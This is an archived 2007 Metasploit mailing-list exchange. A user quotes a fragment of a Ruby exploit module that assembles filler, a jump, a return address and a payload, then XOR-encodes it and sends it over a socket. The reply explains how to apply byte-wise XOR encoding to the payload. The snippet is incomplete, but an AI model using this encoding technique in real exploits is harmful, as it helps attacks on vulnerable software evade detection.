Metasploit mailing list archives

Need assistance with payload xor

From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 28 Mar 2007 23:29:32 -0700

On Wed, Mar 28, 2007 at 12:52:21PM -0500, ri0t wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
                filler =  rand_text_english(1) * (target['Offset'])
                jump = [0xeb06eb06].pack("V")
                retadd = [target.ret].pack('V')
                buffer=jump+retadd+payload.encoded
                buffercoded= xor.encode(buffer, [0xb3].pack("V"))
                sploit =  header + filler + buffercoded[0]
                sock.put(sploit)

                handler
                disconnect
        end


unfortunatly the xor.encode only xor's the first byte of jump retadd  
and payload   not the entire buffer.  I am sure its something i am  
missing due to a simple lack of ruby knowledge but if anyone could  
point me in the right direction i would be greatful


Since you're using the Generic XOR, it defaults to using the size of the
key as the block size for encoding.  I'm guessing what you actually want
to do is XOR each individual byte with 0xb3.  To do this you should use
Rex::Encoding::Xor::Byte.  Make sure you use [0xb3].pack("C").  I think
this should give you the results you're looking for.  If it's still not
working let us know.

Current thread:

Need assistance with payload xor ri0t (Mar 28)
- Need assistance with payload xor mmiller at hick.org (Mar 28)